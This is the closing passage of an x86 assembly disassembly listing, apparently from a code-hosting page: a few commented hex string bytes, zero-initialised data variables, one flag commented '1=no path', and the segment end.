;00DF 68 61 74 20 73 68
|
||||
;00E5 6F 75 6C 64 20 62
|
||||
;00EB 65 20 68 65 72 65
|
||||
x_00F1 dw 0 ;00F1 00 00
|
||||
x_00F3 db 0 ;00F3 00
|
||||
x_00F4 db 0 ;00F4 00
|
||||
x_00F5 dw 0 ;00F5 00 00
|
||||
x_00F7 db 0 ;00F7 00
|
||||
x_00F8 db 0 ;1=no path ;00F8 00
|
||||
seg_a ends
|
||||
|
||||
end start
|
||||
|
Loading…
Reference in New Issue